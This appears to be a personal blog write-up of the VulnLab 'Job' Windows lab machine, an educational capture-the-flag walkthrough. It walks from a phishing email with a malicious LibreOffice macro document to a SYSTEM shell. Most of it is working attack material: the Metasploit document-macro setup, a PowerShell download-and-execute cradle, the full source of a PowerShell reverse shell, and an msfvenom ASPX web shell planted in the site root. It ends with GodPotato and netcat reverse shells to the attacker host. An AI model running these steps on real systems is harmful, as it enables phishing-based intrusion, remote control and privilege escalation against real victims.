vulnlab-job

vulnlab-job

From Phishing to adminEnrique A.
Tools used : sendmail , msfconsole , msfvenom , godpotato

nmap scan

PORT     STATE SERVICE       VERSION
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: JOB, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Job.local
| http-methods: 
|_  Potentially risky methods: TRACE
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-06-28T14:15:50+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: JOB
|   NetBIOS_Domain_Name: JOB
|   NetBIOS_Computer_Name: JOB
|   DNS_Domain_Name: job
|   DNS_Computer_Name: job
|   Product_Version: 10.0.20348
|_  System_Time: 2024-06-28T14:15:10+00:00
| ssl-cert: Subject: commonName=job
| Not valid before: 2024-06-27T12:41:55
|_Not valid after:  2024-12-27T12:41:55
Service Info: Host: JOB; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-06-28T14:15:12
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.24 seconds

 

cat /etc/hosts | grep job
10.10.114.36 job.local

website shows one email: career@job.local

Also, it states that if you are sending your resume, it should be as a libre office document

Phishing try1 getting some windows hashes

1st generata a msf payload

use auxiliary/fileformat/odt_badodt
set LHOST tun0
run

then send a mail, and catch the hashes received

sendemail -s job.local -f "puck <puck@vulnlab.com>" -t career@job.local -o tls=no -m "hey http://10.8.2.138/test" -a bad.odt 
Jun 21 15:46:10 kali sendemail[162513]: Email was sent successfully!
┌──(puck㉿kali)-[~/vulnlab/job]
└─$ impacket-smbserver -smb2support share .
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.99.156,51049)
[*] AUTHENTICATE_MESSAGE (JOB\jack.black,JOB)
[*] User JOB\jack.black authenticated successfully
[*] jack.black::JOB:aaaaaaaaaaaaaaaa:9b4c1be9c604bc2f1fdd46f203c4c1b3:010100000000000080f42a66e1c3da016f7c8cc4409768a80000000001001000640069004c004900700078006a00770003001000640069004c004900700078006a007700020010005500480078006a00430067004b007700040010005500480078006a00430067004b0077000700080080f42a66e1c3da0106000400020000000800300030000000000000000000000000200000f3afad144322c33a39d814751dfc312d1dd988dd18fbcedeab107cb49d9d84730a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000
[*] Closing down connection (10.10.99.156,51049)
[*] Remaining connections []
[*] Incoming connection (10.10.99.156,51050)
[*] AUTHENTICATE_MESSAGE (JOB\jack.black,JOB)
[*] User JOB\jack.black authenticated successfully
[*] 

The hash was uncrackable with john and rockyou.txt

.

Seems phishing is the way to go. So what I did is the following.

The following write-up provides a very good example on how to do this:

https://0xdf.gitlab.io/2020/02/01/htb-re.html

msf6 > set payload windows/x64/exec
payload => windows/x64/exec
msf6 > set LHOST 10.8.2.138
LHOST => 10.8.2.138
msf6 > set LPORT 80
LPORT => 80
msf6 > set cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138/shell.txt');"
cmd => powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138/shell.txt');

shell.txt

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ cat shell.txt            
function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
// Setup IPADDR
$address = '10.8.2.138'
// Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}
                                                                                                                          

 

 

.
msf6 exploit(multi/misc/openoffice_document_macro) > show options

Module options (exploit/multi/misc/openoffice_document_macro):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   BODY                       no        The message for the document body
   FILENAME  msf.odt          yes       The OpenOffice Text document name
   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the
                                         local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)


Payload options (windows/x64/exec):

   Name      Current Setting                         Required  Description
   ----      ---------------                         --------  -----------
   CMD       powershell.exe -nop -w hidden -ep bypa  yes       The command string to execute
             ss -c IEX(New-Object Net.WebClient).Do
             wnloadString('http://10.8.2.138/shell.
             txt');
   EXITFUNC  thread                                  yes       Exit technique (Accepted: '', seh, thread, process, none)


Exploit target:

   Id  Name
   --  ----
   0   Apache OpenOffice on Windows (PSH)



View the full module info with the info, or info -d command.

msf6 exploit(multi/misc/openoffice_document_macro) > set srvport 80
srvport => 80
msf6 exploit(multi/misc/openoffice_document_macro) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/openoffice_document_macro) > 
[*] Using URL: http://10.8.2.138/7Jnb1x3
[*] Server started.
[*] Generating our odt file for Apache OpenOffice on Windows (PSH)...
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic/Standard
[*] Packaging file: Basic/Standard/Module1.xml
[*] Packaging file: Basic/Standard/script-lb.xml
[*] Packaging file: Basic/script-lc.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2/accelerator
[*] Packaging file: Configurations2/accelerator/current.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/META-INF
[*] Packaging file: META-INF/manifest.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Thumbnails
[*] Packaging file: Thumbnails/thumbnail.png
[*] Packaging file: content.xml
[*] Packaging file: manifest.rdf
[*] Packaging file: meta.xml
[*] Packaging file: mimetype
[*] Packaging file: settings.xml
[*] Packaging file: styles.xml
[+] msf.odt stored at /home/puck/.msf4/local/msf.odt
exit
[*] Server stopped.
[*] Server stopped.

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ cp /home/puck/.msf4/local/msf.odt.

now the mailicious odtis downloaded

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.114.36 - - [28/Jun/2024 10:05:37] "GET /7Jnb1x3 HTTP/1.1" 200 -


──(puck㉿kali)-[~/vulnlab/job]
└─$ sendemail -s job.local -f "puck <puck@vulnlab.com>" -t career@job.local -o tls=no -m "hey pls check my cv http://10.8.2.138/test" -a msf.odt
Jun 28 10:03:37 kali sendemail[41500]: Email was sent successfully!

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ rm 7Jnb1x3 
└─$ cp cp shell.txt 7Jnb1x3 


run again !
sendemail -s job.local -f "puck <puck@vulnlab.com>" -t career@job.local -o tls=no -m "hey pls check my cv http://10.8.2.138>
Jun 28 10:03:37 kali sendemail[41500]: Email was sent successfully!

now the shell is downloaded
┌──(puck㉿kali)-[~/vulnlab/job]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.114.36 - - [28/Jun/2024 10:02:57] "GET /7Jnb1x3 HTTP/1.1" 200 -
10.10.114.36 - - [28/Jun/2024 10:04:02] "GET /7Jnb1x3 HTTP/1.1" 200 -


And we catch the shell as user

.
┌──(puck㉿kali)-[~/vulnlab/job]
└─$ rlwrap nc -nlvp 443                  
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.114.36] 52139
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files\LibreOffice\program>whoami
job\jack.black

c:\Users\jack.black\Desktop>type user.txt
VL{0fa1<REDACTED>5dc1}
PS C:\inetpub\wwwroot> dir


    Directory: C:\inetpub\wwwroot


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----        11/10/2021   8:52 PM                aspnet_client                                                        
d-----         11/9/2021   9:24 PM                assets                                                               
d-----         11/9/2021   9:24 PM                css                                                                  
d-----         11/9/2021   9:24 PM                js                                                                   
-a----        11/10/2021   9:01 PM            298 hello.aspx                                                           
-a----         11/7/2021   1:05 PM           3261 index.html                                                           


PS C:\inetpub\wwwroot> curl http://10.8.2.138/cmdasp.aspx -o cmdasp.aspx
PS C:\inetpub\wwwroot> curl http://10.8.2.138/reverse.aspx -o reverse.aspx

 

Privesc

After checking files on folders on this machine, I noticed that inetpub/wwwroot will allow us to upload files to the website

I created a aspx revshell with

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.2.138 LPORT=9001 -f aspx > reverse.aspx

ant then did a curl http://job.local/reverse.aspx , to get a new shell

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.114.36] 53689
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

c:\windows\system32\inetsrv>cd c:\temp
cd c:\temp

c:\temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443" .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
.\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443" .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
[*] CombaseModule: 0x140720521084928
[*] DispatchTable: 0x140720523675512
[*] UseProtseqFunction: 0x140720522968944
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\a0c54595-80de-4e4f-a985-93a2101db089\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000b002-0854-ffff-ad4d-dae1b390a835
[*] DCOM obj OXID: 0x7374a001401060e1
[*] DCOM obj OID: 0x734f5c52566383ce
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 988 Token:0x732  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3552

and we have a admin shell

SeImpersonatePrivilege is enabled. , so we used GodPotato

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ nc -nlvp 443  
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.114.36] 53837
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

C:\temp>whoami
whoami
nt authority\system

c:\Users\Administrator\Desktop>type root.txt
type root.txt
VL{0102<REDACTED>5152}

 

That’s all.
We now have  a Admin reverse shell.

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *